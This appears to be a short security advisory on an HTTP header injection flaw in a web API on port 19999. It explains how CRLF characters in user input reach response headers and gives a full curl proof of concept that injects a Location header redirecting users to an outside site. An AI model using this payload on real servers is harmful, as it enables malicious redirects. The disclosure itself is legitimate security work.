HTTP Header Injection vulnerabilities occur when user input is insecurely included within server responses headers. Specifically they are based around the idea that an attacker can cause the server to generate a response which includes carriage-return and line-feed characters (or %0D and %0A respectively in their URI encoded forms) within the server response header the attacker may be able to add crafted headers themselves. To carry out the exploitation, we must perform the following request: curl 'http://127.0.0.1:19999/api/v1/data?chart=system.cpu&format=json&points=341&group=average>ime=0&options=ms%7Cflip%7Cjsonwrap%7Cnonzero&after=360&_=1540750636464&filename="%0aLocation: http://red4sec.com?' -H 'Pragma: no-cache' -H 'Accept-Encoding: gzip, deflate' --compressed -v This request adds the payload: "%0aLocation: http://red4sec.com? which will inject into the server's response the Location header that allows to arbitrarily redirect a user.